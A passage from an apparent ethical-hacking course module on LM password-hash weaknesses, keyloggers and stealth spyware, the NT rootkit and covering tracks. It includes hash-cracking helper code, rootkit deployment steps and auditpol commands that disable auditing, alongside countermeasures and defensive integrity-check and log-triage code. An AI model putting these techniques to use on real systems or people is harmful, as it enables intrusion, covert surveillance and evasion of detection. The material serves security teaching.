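jsmith:1001:0123456789ABCDEFAAD3B435B51404EE:0011223344556677889900AABBCCDDEE:::
"""


def parse_pwdump(text):
    """Yield (user, rid, lmhash, nthash) from pwdump-style lines; skip comments and junk."""
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(":")
        if len(parts) < 4:
            continue                      # malformed line: skip rather than guess
        yield parts[0], parts[1], parts[2].upper(), parts[3].upper()


def lm_halves(lmhash):
    """Split a 32-hex-digit LM hash into its two independent 8-byte (16 hex digit) halves."""
    if len(lmhash) != 32:
        raise ValueError("LM hash must be 32 hex digits, got %d" % len(lmhash))
    return lmhash[:16], lmhash[16:]


def triage(lmhash):
    """Classify one LM hash: 'no-lm', 'short' (<= 7 chars) or 'long' (8-14 chars)."""
    if lmhash == NO_LM:
        return "no-lm"                    # nothing to crack here; look at the NT hash instead
    first, second = lm_halves(lmhash)
    if second == EMPTY_HALF:
        return "short"                    # only the first half needs cracking
    return "long"                         # two halves, each attacked independently


def triage_dump(text):
    """Map every user in the dump to its LM triage class."""
    return {user: triage(lm) for user, _rid, lm, _nt in parse_pwdump(text)}


def lm_prepare(password):
    """Upper-case, null-pad to 14 bytes and split into the two 7-byte DES key halves."""
    data = password.upper().encode("ascii")[:14].ljust(14, b"\x00")
    return data[:7], data[7:]


def des_key_from_7_bytes(k7):
    """Spread 56 bits over 8 bytes, one parity bit each, as the LM algorithm does."""
    bits = int.from_bytes(k7, "big")
    out = bytearray()
    for i in range(8):
        seven = (bits >> (49 - 7 * i)) & 0x7F    # next 7 bits, MSB first
        b = seven << 1                           # leave the low bit for parity
        if bin(b).count("1") % 2 == 0:           # make the byte odd-parity
            b |= 1
        out.append(b)
    return bytes(out)


if __name__ == "__main__":
    for user, cls in triage_dump(SAMPLE_DUMP).items():
        print("%-14s %s" % (user, cls))
    first, second = lm_prepare("123456qwerty")
    print(first, second, des_key_from_7_bytes(second).hex())
```

The triage is worth running before a cracking session: accounts classified "no-lm" are wasted effort for an LM cracker, and "short" accounts are where a wordlist or a brute-force run finishes first.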

Threat  

A cracker can tell at a glance whether a password has an eighth character: if not, the second half of the LM hash is the constant above. A captured LM challenge response can likewise be brute-forced back to the LM hash, since the response is a deterministic function of the hash and the sniffed challenge. The effective keyspace of the LM hash (upper-case only, two independent seven-character halves) is tiny compared with that of the Windows NT hash, which is case-sensitive and computed over the whole password.

Countermeasure  

While stronger protocols such as Kerberos are an effective countermeasure, Windows 9x and Windows NT cannot use Kerberos version 5 for authentication. Even in a Windows Server 2003 domain, therefore, these systems authenticate by default with the LM and NTLM protocols. What is possible is to move them to NTLMv2, which replaces the DES-based response with an HMAC-MD5 computed over the server challenge and a client-supplied challenge, so an eavesdropper can no longer crack the response back to the weak LM hash. To enforce this, set the LAN Manager Authentication Level on these systems to "Send NTLMv2 responses only" (Windows 9x needs the Directory Services Client installed to support NTLMv2).

start sidebar
Password Cracking Countermeasures
  • Enforce 7 to 12 character alphanumeric passwords.

  • Set the password change policy to 30 days.

  • Physically isolate and protect the server.

  • Use the SYSKEY utility to encrypt the password hashes stored on disk.

  • Monitor the server logs for brute force attacks on user accounts.

end sidebar
 

Password cracking is the term for recovering the password that protects a network, system or resource, with or without the use of tools, in order to gain access to it.

Countermeasure  

The first countermeasure is to make sure that users choose strong passwords: at least 8 characters long and ideally a mix of letters, digits and special characters or symbols. The next step is user awareness of basic security practices, such as never writing a password on a note stuck to the monitor. Have users change passwords regularly and never leave a console unlocked.

Adopt the practice of isolating the server for more security. Preferably no applications should be running on the authentication server so that vulnerabilities if any are not exploited. SYSKEY can be used to store hashes on the system. Passwords in the SAM database are stored in hashed form to prevent a user who gains access to the database from reading the passwords.

However, offline password attacks are still possible if an attacker obtains a copy of the database and is willing to devote the time needed for an exhaustive search of all possible passwords. The Syskey tool is designed to raise the bar against such attacks by encrypting the password hashes in the SAM database with a 128-bit key. Running the SYSKEY command selects the System Key option and generates the initial key value, which may be either machine-generated or derived from a password. The command first displays a dialog showing whether strong encryption is enabled or disabled. Once strong encryption has been enabled, it cannot be disabled.

It always pays to be alert for intrusion or suspicious activity that can help detect password cracking activity. Logs should be carefully monitored for tell-tale signs and adequate defensive measures taken.

start sidebar
Keystroke Loggers
  • If all other attempts to sniff out domain privileges fail, then keystroke logger is the solution.

  • Keystroke loggers sit between the keyboard and the applications that consume its input, either as a device on the keyboard cable or as stealth software hooking the operating system's input path, so that they can record every keystroke.

  • There are two types of keystroke loggers:

    1. Software based and

    2. Hardware based.

end sidebar
 

Keystroke loggers come in both hardware and software forms and are used to capture and compile a record of everything typed using the keyboard and making it available to another person / agency probing the user. This may be conveyed over e-mail or a Web site or even saved on the same system as a hidden file.

Generic keystroke loggers record the application name, time and date the application was opened, and the keystrokes associated with that application. The appeal keystroke loggers have is the ability to capture information before it can be encrypted for transmission over the network. This gives the person probing access to pass phrases and other well-hidden information. Keystroke loggers can be broadly classified as hardware keystroke loggers and software keystroke loggers.

Hardware keystroke loggers are devices that attach physically to the keyboard cable and record the data passing through. They generally look like a standard keyboard adapter and remain camouflaged unless someone specifically looks for them. To retrieve the data from a hardware logger, the person doing the probing must regain physical access to the device: hardware loggers store keystrokes in the device itself and generally cannot send them out over a network. Their primary advantage is that no anti-spyware, anti-virus or desktop security program will discover them, because nothing runs on the host.

Software keystroke loggers are more widely used because they can be installed remotely over the network, as part of a virus or Trojan, and the person probing needs no physical access to collect the data, which is typically e-mailed out from the machine periodically. Software loggers can also capture far more, since they are not limited by the memory of a physical device. Magic Lantern, reportedly developed as part of the FBI's Carnivore project, is a Trojan keylogger aimed specifically at capturing encryption passphrases for transmission back to the FBI.

start sidebar
Spyware: Spector (www.spector.com)
  • Spector is spyware that records everything anyone does on the Internet.

  • Spector automatically takes hundreds of snapshots every hour , very much like a surveillance camera. With spector, you will be able to see exactly what your surveillance targets have been doing online and offline.

  • Spector works by taking a snapshot of whatever is on your computer screen and saves it away in a hidden location on your computer's hard drive.

end sidebar
 
Tools  

Spector Pro is designed to execute as a stealth spyware or monitoring software, by keeping track of the user's activities. By default, the software monitors Web browsing, mail, and Internet chat, with provisions for retaining and updating a list of Web sites visited, mail sent and received, and chat transcripts with other users. It can also block access to specified Web sites.

Spector Pro acts as an activity monitor by also taking snapshots of the screen at regular, preset intervals. The stealth installation leaves no icons, no installation file, and no notice when the software loads on computer bootup . The attacker can access the software with a hot-key combination that can be customized, and password protected.

The software tracks every keystroke entered on the keyboard, regardless of the application. It can be configured to alert the person who monitors the target computer via e-mail according to his monitoring preferences ” such as when certain keywords are received or typed, specific Web sites visited, or specific words typed in to any application.

Spector Pro has its limitations too. It does not recognize Microsoft Messenger and many other messenger clients; for those, the attacker can still retrieve the local user's side of the chat from the keystroke log, but by default nothing sent or received through unsupported clients is captured. Likewise, a target who uses a browser other than IE or Mozilla escapes its web-browsing capture. The mail-capture facility works with e-mail clients such as Outlook and Eudora and most POP3/SMTP clients, but it does not cover web mail.

start sidebar
Hacking Tool: eBlaster (www.spector.com)
  • eBlaster lets you know EXACTLY what your surveillance targets are doing on the internet even if you are thousands of miles away.

  • eBlaster records their e-mails, chats, instant messages, websites visited and keystrokes typed and then automatically sends this recorded information to your own e-mail address.

  • Within seconds of them sending or receiving an email, you will receive your own copy of that email.

end sidebar
 
Tools  

As with Spector Pro, eBlaster can be installed in stealth mode; the eBlaster .EXE file can even be sent to the target over the network. It functions as a hidden program that not only taps every keystroke on the target computer but also records and forwards the victim's e-mail to the watcher. eBlaster automatically compiles a report and delivers it via e-mail through SpectorSoft's SMTP mail server, on a schedule ranging from hourly to daily, with detailed information on activity across the pre-selected applications.

eBlaster will record BOTH sides of a conversation in the following chat and instant message programs: AOL chat rooms, AOL Instant Messenger, ICQ, MSN Messenger, Yahoo Messenger.

eBlaster will record every keystroke typed on the computer -- whether part of a chat conversation, an instant message, an email, a Word document, or even a password typed. The eBlaster Activity Report includes application the keystrokes were captured in, date and time the characters were captured and actual captured characters.

eBlaster does not show up as an icon, does not appear in the Windows system tray, does not appear in Windows Programs, does not show up in the Windows task list and cannot be uninstalled without the eBlaster password specified by the installer. It does not initiate connections to the internet and will only forward email and send activity reports when the monitored computer is already connected to the internet. eBlaster has a built-in e-mail client that will automatically send reports without using the host's normal e-mail program.

eBlaster has the power to act as a basic keystroke monitor and an intensive security surveillance system.

start sidebar
IKS Software Keylogger
end sidebar
 
Tools  

IKS (Invisible Keylogger) is a desktop activity logger powered by a kernel-mode driver, which lets it run silently at the lowest level of Windows 2000/XP. IKS is extremely difficult to detect because of its stealth methods; the only evidence of it is a binary keystroke log file that grows as keystrokes are entered. All keystrokes are recorded, including the Ctrl-Alt-Del sequence and keystrokes typed in a DOS box or a Java chat room.

In addition to a flexible and friendly keystroke log viewer, IKS is extremely configurable. For manual setup, an attacker needs to copy just one program file to the target computer and add two lines to the system.ini file. He can then rename the log file, or even the program itself, so that even an exhaustive hard drive search will not identify the program for what it is.

IKS has an internal memory buffer of 100 keystrokes. In order to increase performance of the system, the program will not dump the buffer to the disk until it is full or if the keyboard is idle for about three minutes with keystrokes in the buffer. When the system is shutting down, however, the program will dump the buffer immediately if there are any keystrokes in it.

Invisible Keylogger will record all clipboard text and save it for later viewing. This enables the user to see all text even text that has been cut and pasted in a browser, email, or anywhere . Invisible Keylogger will also record desktop activity at set intervals. The user can choose to have Invisible Keylogger only record activity if the target is present. Invisible Keylogger can be configured to clear all logs at set intervals as an added security measure. The user can export Invisible Keylogger's recorded logs into an easy to read HTML document for later viewing or records. Invisible Keylogger encrypts all logs files and protects them from being viewed.

start sidebar
Hacking Tool: Hardware Key Logger (www.keyghost.com)
  • The Hardware Key Logger is a tiny hardware device that can be attached in between a keyboard and a computer.

  • It keeps a record of all key strokes typed on the keyboard. The recording process is totally transparent to the end user.

end sidebar
 
Tools  

We introduced keystroke loggers, including hardware loggers, in the generic discussion earlier. Let us take a look at a popular hardware keystroke logger, KeyGhost. KeyGhost records all keystrokes into a built-in flash memory chip; even keystrokes typed in the BIOS setup and in DOS are captured.

The keystrokes can only be retrieved by an administrator with a proper password. The device can be installed even when the target computer is logged out, has a password, is locked or switched off. The device can be unplugged and the keystrokes retrieved on another computer.

Over 500,000 keystrokes can be stored with strong 128-bit encryption in non-volatile flash memory (same as in smart cards) that doesn't need batteries to retain storage. The device works on any desktop PC & all PC operating systems, including Windows 3.1, 95, 98, NT, 2000, Linux, OS/2, DOS, Sun Solaris and BeOS. No software installation is needed at all to record or retrieve keystrokes.

Recorded keystrokes can be played back into any text editor using proprietary 'keystroke ghosting' technique. The device plugs into computers with a small PS/2 keyboard plug or a large DIN plug. Unlike software keystroke recorders , KeyGhost records every keystroke, even those used to modify the BIOS before bootup. The greatest advantage is that it is impossible to detect or disable using software. One must visually scan the back of the computer where the keyboard is plugged in to detect its presence.

The only way to check for keystroke logging hardware is to familiarize with what it looks like and visually scan the machine on a regular basis. Taking pictures of the inside and outside of the machine may also be adopted. KeyGhost also makes keyboards with the key logger built straight in, which makes it much more difficult to spot.

start sidebar
Anti Spector (www.antispector.de)
  • This tool detects Spector and removes it from your system.

end sidebar
 

As there are two sides to every coin, monitoring software has anti-monitoring software tracking it. The detection process is similar to that of anti-virus software detecting a virus by its signature.

Tools  

"SpyGuard" can detect spy software like programs from SpectorSoft and block it from sending information back to the spymaster or eliminate it completely. Ancillary functions include the deletion and shredding of confidential files and pictures, and erasing your Internet history and cache files. SpyGuard will not only detect these programs but it will let the user know exactly which spy programs are running on the computer and it will then destroy these programs and all of their recorded information.

In combating software loggers, you can also take a snapshot of the contents of your hard drive, so that alterations made by programs to other files can be spotted. You must take a new snapshot each time you install software or upgrade the system to keep it current, and you should store the snapshot file off the computer in a private location so that it cannot be altered by someone with physical or remote access to the machine. Products that take system snapshots include Snapshot Spy Pro and ArkoSoft System Snapshot (for Windows). Fcheck is one of the more trusted programs of this kind for Linux machines.

There are a few programs out there specifically designed to detect keystroke logging software. Two that have received good reviews are Anti-keylogger and SpyCop. Neither of these programs is free, but Anti-keylogger does have a demo version that allows you to scan your machine for logging programs.

start sidebar
Hacking Tool: RootKit

What if the very code of the operating system came under the control of the attacker?

  • The NT/2000 rootkit is built as a kernel mode driver which can be dynamically loaded at run time.

  • The NT/2000 rootkit runs with system privileges, right at the core of the NT kernel, so it has access to all the resources of the operating system.

  • The rootkit can also:

    • hide processes (that is, keep them from being listed)

    • hide files

    • hide registry entries

    • intercept keystrokes typed at the system console

    • issue a debug interrupt, causing a blue screen of death

    • redirect EXE files

end sidebar
 
Note  

Traditionally rootkits have been associated with UNIX and, more recently, with Linux. Windows was long considered not to be vulnerable to rootkits, but that no longer holds. Before we discuss the NT rootkit, let us take a brief look at what rootkits are, what they do and how they are used.

Once an attacker has accessed the target system he may want to revisit it, for instance to use it as a launch pad for other activities. Naturally he wants to secure his base so that the probability of detection is minimal. This is where a rootkit comes in. It bears repeating that a rootkit is not used to gain root, but to protect the use of root already gained.

Note  

Typically a rootkit is a bundle of tools: a network sniffer, log-cleaning scripts or utilities, and patches or trojaned replacements for system binaries that alter execution paths. The rootkit is installed after the attacker has exploited a known vulnerability or cracked the password of an administrator-level account; it then covers his tracks and makes his continued presence difficult to detect. Thus the rootkit undermines the existing security of the affected system and violates its integrity.

Concept  

The primary purpose of a rootkit is to allow an attacker unregulated and undetected access to a compromised system repeatedly. Installing a backdoor process or replacing one or more of the files that run the normal connection processes can help meet this objective.

To facilitate continued access, a rootkit may disable auditing, edit event logs and circumvent IDS. The rootkit may be used by more than one attacker as it can allow anyone to log in based on backdoor password access and obtain administrator-level access to a computer or computer network.

As stated earlier, execution paths may be modified, or system binaries may be replaced, so that attackers and the processes they run become invisible. On a UNIX system the targets are core binaries such as ps, w, who, netstat, ls and find, and anything else used to monitor server activity. The replacements are not obvious at first glance, since most rootkits mimic the timestamps and file sizes of the original binaries; only a cryptographic checksum against a trusted baseline reveals them.

The most effective rootkits are designed as device drivers, because that gives them the greatest control over the operating system for hiding Trojans, DDoS tools and altered data from change-detection applications such as Intact and Tripwire. Operating in kernel space, they have free rein over virtually all system functions, including the file-read calls such a checker relies on.

We look at the NT rootkit here, as Linux rootkits are covered in later modules. Apart from a few differences in composition, the functionality and use of rootkits are similar across platforms. Consider, for instance, some of the attacks that become possible by patching the NT kernel.

Threat  

An attacker is equipped with armory to:

  • Insert invalid data into any network stream. On a long term basis, this can be worked to the attacker's advantage as he can also introduce errors into the fixed storage system, thereby corrupting the backups as well.

  • Deploy ICMP as a covert channel, and read ICMP packets coming into the kernel for embedded commands.

  • Sniff network traffic - emulating the behavior of the Ethernet, but without all of the driver components - if it has patched the Ethernet. This lets it stream data in/out of the network including crypto keys.

  • Capture important data by patching existing DLLs, such as wininet.dll.

  • Evade the IDS system.

  • Elude the event log, by patching it to ignore certain event log messages.

  • Hide processes to keep them from being listed.

  • Hide files and registry entries.

  • Log keystrokes.

  • Redirect executable files.

  • Issue commands that result in a Blue Screen of Death... and much more.

start sidebar
Planting the NT/2000 Rootkit
  • The rootkit contains a kernel mode device driver, called _root_.sys and a launcher program, called deploy.exe

  • After gaining access to the target system, he will copy _root_.sys and deploy.exe onto the target system and execute deploy.exe

  • This will install the rootkit device driver and start it up. The attacker later deletes deploy.exe from the target machine.

  • The attacker can then stop and restart the rootkit at will with the commands net stop _root_ and net start _root_

  • Once the rootkit is started, the file _root_.sys stops appearing in the directory listings. The rootkit intercepts the system calls for listing files and hides all files beginning with _root_ from display.

end sidebar
 
Attack Methods  

Let us look at the NT Rootkit deployment and the potential damage it can cause. We are looking at the proof-of-concept NT Rootkit created by Greg Hoglund. The NT rootkit stages itself at the kernel level, acting as a 'man in the middle' between the OS and the applications that depend on it. As a kernel-mode driver it can be loaded dynamically at run time, so the attacker can use it without rebooting the system. Because it runs in the kernel it executes with system privileges, giving the attacker access to all resources of the operating system and effectively raising his administrator rights to those of the SYSTEM account.

The kit can be considered stealthy in that it does not show up in netstat on Windows NT or 2000. This is due to the rootkit's own, stateless TCP/IP stack implementation. How, then, does it handle remote connections? On a LAN it infers the state of a connection from the data within each incoming packet, and for this reason it also has a hard-coded IP address to which it responds.


This default IP address is 10.0.0.166. Again, as the rootkit uses raw connections, it does not matter which port it uses on the target machine. The latest version (0.44) does not have a keyboard sniffer, though the earlier version (0.43) did. In this respect it resembles the well-known Trojans SubSeven and Back Orifice (BO).


The rootkit hides processes if the attacker wants it to: any process whose name starts with '_root_' is hidden, toggled on and off with 'hideproc' from the kernel-mode shell. Similarly, it hides files and directories carrying the prefix when 'hidedir' is toggled on. Processes that themselves carry the '_root_' prefix are exempt from the filtering, so the attacker's own tools still see everything.

The rootkit also demonstrates its capability to redirect execution paths. The latest build contains an example in which calc.exe is executed in place of any executable with a _root_ prefix. This does not affect the ability to read the file; the rootkit intervenes only when the file is executed. In the registry, the rootkit hides keys identified by the same _root_ prefix.

Because processes named with the prefix are exempt from the filtering, the attacker can still view the hidden keys: a copy of regedit.exe named '_root_regedit.exe' sees all of them. Here is a directory listing from a system, before and after the attacker activated the rootkit.

start sidebar
Rootkit Countermeasures
  • Back up critical data (not binaries!). Wipe everything clean and reinstall the OS and applications from a trusted source.

  • Don't rely on backups, because you could be restoring from trojaned software.

  • Keep a well documented automated installation procedure.

  • Keep availability of trusted restoration media.

end sidebar
 

What we have looked at is just a proof-of-concept tool. Others are out in the wild, such as null.sys, Hacker Defender and many more that are not yet well researched. Of these, "Slanret", "IERK" and "Backdoor-ALI" are detected by anti-virus products. Slanret is a rootkit component that ships with a backdoor program called "Krei", which listens on an open port and permits remote access to the system. Slanret itself is a stealth device driver that accepts commands telling it which files or processes to conceal.

Countermeasure  

One thing common to these rootkits is that the attacker needs administrator access to the target system first, and the initial attack that yields this access is often very noisy. Unusual network traffic around the time a new exploit is published should be monitored, and log analysis is part and parcel of risk management. The attacker may have scripts or tools to cover his tracks, but there will usually be other tell-tale signs that allow proactive rather than merely reactive countermeasures.

If you are on the reactive side, back up all critical data, excluding binaries, and perform a fresh installation from a trusted source. Checksumming code is a good defense against tools like rootkits: MD5sum.exe can fingerprint files so that integrity violations are noticed when changes occur, provided the baseline was taken from a known-good system and is stored where the attacker cannot alter it. The installation should preferably be automated and well documented, and trusted restoration media should always be at hand.
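The snapshot approach from the keylogger discussion earlier and the MD5sum.exe checksumming recommended here are the same technique: a trusted baseline of file fingerprints compared against the live system. The following Python is an added example (not the module's tool, not Tripwire, and not any of the snapshot products named): build_baseline() hashes every regular file under a root, compare() reports what was added, removed or changed, and demo() runs it over a constructed temporary tree in which a binary is replaced by one of identical size, a driver file is dropped and a log is deleted. SHA-256 is used in place of MD5 because MD5 collisions are now practical.

```python
"""File-integrity baseline and comparison.

Added example for this module; not the module's MD5sum.exe, Tripwire or any
'system snapshot' product. It records a digest of every regular file under a
root and later reports files added, removed or changed. SHA-256 is used rather
than MD5 because MD5 collisions are practical today. demo() builds a constructed
temporary tree so the example runs offline.
"""
import hashlib
import os
import tempfile


def hash_file(path, algorithm="sha256", chunk=65536):
    """Digest a file in chunks so large binaries do not have to fit in memory."""
    h = hashlib.new(algorithm)
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def build_baseline(root, algorithm="sha256"):
    """Map each regular file (path relative to root, '/'-separated) to its digest."""
    baseline = {}
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames.sort()                          # deterministic walk order
        for name in sorted(filenames):
            full = os.path.join(dirpath, name)
            if os.path.islink(full) or not os.path.isfile(full):
                continue                         # symlinks and special files are out of scope
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            baseline[rel] = hash_file(full, algorithm)
    return baseline


def compare(old, new):
    """Return (added, removed, changed) as sorted lists of relative paths."""
    added = sorted(set(new) - set(old))
    removed = sorted(set(old) - set(new))
    changed = sorted(p for p in set(old) & set(new) if old[p] != new[p])
    return added, removed, changed


def _write(root, rel, data):
    """Create a file (and its parent directories) below root."""
    path = os.path.join(root, *rel.split("/"))
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "wb") as f:
        f.write(data)


def demo():
    """Constructed scenario: trojaned netstat (same size), dropped driver, deleted log."""
    with tempfile.TemporaryDirectory() as root:
        _write(root, "system32/netstat.exe", b"original netstat")
        _write(root, "system32/cmd.exe", b"original cmd")
        _write(root, "logs/secevent.evt", b"security log")
        known_good = build_baseline(root)        # taken while the system is still trusted

        # What a rootkit install might leave behind: name and size preserved, content not.
        _write(root, "system32/netstat.exe", b"trojaned netstat")
        _write(root, "system32/_root_.sys", b"kernel driver")
        os.remove(os.path.join(root, "logs", "secevent.evt"))

        return compare(known_good, build_baseline(root))


if __name__ == "__main__":
    added, removed, changed = demo()
    print("added:  ", added)
    print("removed:", removed)
    print("changed:", changed)
```

The digest catches the same-size replacement that defeats a timestamp-and-size comparison. The caveat from the rootkit discussion stands, though: a kernel-mode rootkit can filter the reads this checker performs, so run it from trusted boot media against the offline disk, and keep the baseline where the attacker cannot rewrite it.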

Another common trait of the rootkits discussed here is their dependency on device drivers. One quick check is to boot in Safe Mode with a minimal set of drivers, which deprives the rootkit of its cloaking mechanism and makes the hidden files visible. The check is not conclusive, since a rootkit can register its driver to load in Safe Mode as well, so treat it as a first look rather than proof of a clean system.

start sidebar
Covering Tracks
  • Once intruders have gained Administrator access on a system, they try to conceal their presence.

  • When all the information of interest has been stripped from the target, they will install several back doors so that easy access can be obtained in the future.

end sidebar
 

Under the discussion on rootkits we saw how attackers try to remain undetected on the compromised system. One way of ensuring that they do not have to take the noisy way in, is to install backdoors that are password protected. This need not be restricted to a single backdoor. It is a known practice to have multiple Trojans and at least one Ethernet sniffer as part of the rootkit.

With the Ethernet sniffer, an attacker can capture authentication credentials and later use them to log in, so that the login passes as a normal event. On Unix/Linux systems, the rootkit carries trojaned versions of the core utilities as local system Trojans. Above all, the attacker wants to keep the system from ringing any alarm bells.

Attack Methods  

Erasing evidence of a compromise is a requirement for any attacker who wants to stay unnoticed. This usually starts with erasing the records of the logins used and any error messages generated by the attack; a buffer overflow attack, for example, usually leaves a message in the system logs. Next, attention turns to making sure future logins are not logged. A good way of keeping the system administrator trusting the output of his system is to manipulate the event logs and tweak the audit settings rather than disable them outright.

Because the first thing a system administrator does to look for unusual activity is to check the system log files, it is very common for intruders to use a utility to modify the logs. In extreme cases a rootkit disables logging altogether and discards all existing logs. When intruders intend to use the system for a long time as a launch base for further intrusions, however, an empty log would draw attention, so they remove only those portions of the logs that reveal their presence.

start sidebar
Disabling Auditing
  • First thing intruders will do after gaining Administrator privileges is to disable auditing.

  • NT Resource Kit's auditpol.exe tool can disable auditing using command line.

  • At the end of their stay, the intruders will just turn on auditing again using auditpol.exe

end sidebar
 
Note  

One of the first steps for an attacker who has gained command-line access is to determine the auditing status of the target system, locate sensitive files (such as password files) and implant automatic information-gathering tools (such as a keyboard logger or network sniffer).

Windows auditing records certain events to the Event Log (or associated syslog). The log can be set to send alerts (email, pager, etc) to the system administrator. Therefore, the attacker will want to know the auditing status.


auditpol.exe is a part of the NT resource kit and can be used as a simple command line utility to find out the audit status of the target system and also to make changes to it.

The attacker will need to have the utility installed in the WINNT directory. He can then establish a null session to the target machine and run the command:

 C:\> auditpol \\<ip address of target> 

This will reveal the current audit status of the system. He can choose to disable the auditing by:

 C:\> auditpol \\<ip address of target> /disable 

This will make changes in the various logs that might register his actions. He can choose to hide the registry keys changed later on.

Countermeasure  

There is no effective technique to lock the audit policy so as to prevent auditpol from disabling it. However, one can create a scheduled task that checks the status of auditing and turns it back on if it has been disabled. Most host-based IDS products will automatically re-enable auditing if it has been turned off.

Note  

Event log ID 612 indicates that audit policy has been changed.

There are a number of reasons why auditing is important. These include:

  • Successful attacks are often preceded by a series of unsuccessful ones.

  • Detecting an attack in its early phase can contain the damage.

  • Recovery often depends on a realistic damage assessment.

  • Auditing and intrusion detection help determine the causal factors and people behind the attack.

  • Assessing network compromise is dependent on auditing as well. One of the main goals of auditing is to identify the actions taken by attackers on your network. An attacker may attempt to compromise multiple computers and devices on the network.

start sidebar
Clearing the Event log
  • Intruders can easily wipe out the logs in the Event Viewer.

  • The Event Viewer on the attacker's host can open, read and clear the logs of the remote host.

  • This process will clear the log of all records but will leave one record stating that the event log has been cleared by 'Attacker'.

end sidebar
 

We mentioned that Event log ID 612 indicates that the audit policy on the system has been changed. Assuming that we have a well-balanced audit policy, the various logs on the system can reveal a lot of information. However, intruders can easily wipe out evidence in the Event Viewer by opening the logs of the remote host and clearing the entries. What happens when the event log itself is changed or deleted? An event log with a single entry is definitely a giveaway.

Note  

The event-logging service controls whether events are tracked on Windows 2000 systems. When this service is started, user actions and system resource usage events can be tracked in the following event logs:

  • Application Log: Records events logged by applications.

  • Directory Service: Records events logged by Active Directory and its related services.

  • DNS Server: Records DNS queries, responses, and other DNS activities.

  • File Replication Service: Records file replication activities on the system.

  • Security Log: Records events set for auditing with local or global group policies.

  • System Log: Records events logged by the operating system or its components, such as the failure of a service to start at bootup.

In the Security Log, always check on event IDs 529 "Unknown user or bad password," 680 "Account logon," and 517 "Security Log Cleared."

Tools  

Dump Event Log is a command-line tool, included in the Windows 2000 Server Resource Kit. It will dump an event log for a local or remote system into a tab separated text file. This file can then be imported into a spreadsheet or database for further investigation. The tool can also be used to filter for or filter out certain event types.

The following syntax is used by the dumpel.exe tool:

dumpel -f file [-s \\server] [-l log [-m source]] [-e n1 n2 n3...] [-r] [-t] [-d x]

Where:

-f file. Specifies the file name for the output file. There is no default for -f, so you must specify the file.

-s server. Specifies the server for which you want to dump the event log. Leading backslashes on the server name are optional.

-l log. Specifies which log (system, application, security) to dump. If an invalid log name is specified, the application log is dumped.

-m source. Specifies in which source (such as redirector (rdr), serial, and so on) to dump records. Only one source can be supplied. If this switch is not used, all events are dumped. If a source is used that is not registered in the registry, the application log is searched for records of this type.

-e n1 n2 n3. Filters for event ID nn (up to 10 can be specified). If the -r switch is not used, only records of these types are dumped; if -r is used, all records except records of these types are dumped. If this switch is not used, all events from the specified source name are selected. You cannot use this switch without the -m switch.

-r. Specifies whether to filter for specific sources or records, or to filter them out.

-t. Specifies that individual strings are separated by tabs. If -t is not used, strings are separated by spaces.

-d x. Dumps events for the past x days.

Note  

Dumpel can only retrieve content from the system, application, and security log files. You cannot use Dumpel to query content from the File Replication Service, Domain Name System (DNS), or Directory Service event logs.
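The following is an added example, not part of the original text or of the Resource Kit: a small triage script that reads a tab-separated dump of the kind dumpel -t produces and flags the Security log event IDs singled out above (612 audit policy changed, 517 log cleared, and a run of 529 bad-password failures followed by a successful logon, ID 528). The column layout and the sample rows are assumptions constructed for the example.

```python
"""Triage of a dumpel-style event log dump (all data constructed inline).

Flags the Security log event IDs discussed above: 612 (audit policy
changed), 517 (security log cleared) and runs of 529 (bad password)
followed by a 528 (successful logon, a standard NT/2000 event ID) for
the same account within a short window.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Assumed column layout of a `dumpel -t` dump (tab separated). Check it
# against your own dumpel output before relying on these positions.
FIELDS = ("date", "time", "type", "category", "event_id",
          "source", "user", "computer", "strings")

# Constructed sample rows; not output from any real system.
# type 8 = success audit, 16 = failure audit (Win32 event type values).
_FAILED_GUESSES = [
    ("3/12/2003", f"02:10:0{s}", "16", "2", "529", "Security",
     "NT AUTHORITY\\SYSTEM", "FILESRV",
     "Logon Failure: Reason: Unknown user name or bad password "
     "User Name: administrator")
    for s in (5, 6, 7, 8)
]
SAMPLE_ROWS = [
    ("3/12/2003", "01:00:00", "8", "2", "528", "Security",
     "FILESRV\\jsmith", "FILESRV", "Successful Logon: User Name: jsmith"),
    *_FAILED_GUESSES,
    ("3/12/2003", "02:10:20", "8", "2", "528", "Security",
     "FILESRV\\administrator", "FILESRV",
     "Successful Logon: User Name: administrator"),
    ("3/12/2003", "02:11:30", "8", "9", "612", "Security",
     "FILESRV\\administrator", "FILESRV", "Audit Policy Change"),
    ("3/12/2003", "02:15:02", "8", "1", "517", "Security",
     "FILESRV\\administrator", "FILESRV", "The audit log was cleared"),
]
SAMPLE_DUMP = "\n".join("\t".join(row) for row in SAMPLE_ROWS) + "\n"


def parse_dump(text):
    """Parse tab-separated dumpel lines into dicts, oldest event first."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        rec = dict(zip(FIELDS, line.split("\t", len(FIELDS) - 1)))
        rec["event_id"] = int(rec["event_id"])
        rec["when"] = datetime.strptime(
            f"{rec['date']} {rec['time']}", "%m/%d/%Y %H:%M:%S")
        # Failed logons are recorded under SYSTEM; the account actually
        # tried is only in the description, so prefer that when present.
        match = re.search(r"User Name:\s*(\S+)", rec.get("strings", ""))
        rec["account"] = (match.group(1) if match else rec["user"]).lower()
        events.append(rec)
    return sorted(events, key=lambda r: r["when"])


def triage(events, fail_threshold=3, window=timedelta(minutes=5)):
    """Return (severity, time, message) findings for the events given."""
    findings = []
    recent_failures = defaultdict(list)   # account -> failure timestamps
    for ev in events:
        eid, acct, now = ev["event_id"], ev["account"], ev["when"]
        if eid == 612:
            findings.append(("HIGH", now,
                             f"audit policy changed by {ev['user']}"))
        elif eid == 517:
            findings.append(("HIGH", now,
                             f"security log cleared by {ev['user']}"))
        elif eid == 529:
            fails = [t for t in recent_failures[acct] if now - t <= window]
            fails.append(now)
            recent_failures[acct] = fails
            if len(fails) == fail_threshold:
                findings.append(("MEDIUM", now,
                                 f"{fail_threshold} bad-password failures "
                                 f"for {acct} within {window}"))
        elif eid == 528:
            fails = [t for t in recent_failures[acct] if now - t <= window]
            if len(fails) >= fail_threshold:
                findings.append(("HIGH", now,
                                 f"logon for {acct} succeeded after "
                                 f"{len(fails)} recent failures"))
    return findings


if __name__ == "__main__":
    for severity, when, message in triage(parse_dump(SAMPLE_DUMP)):
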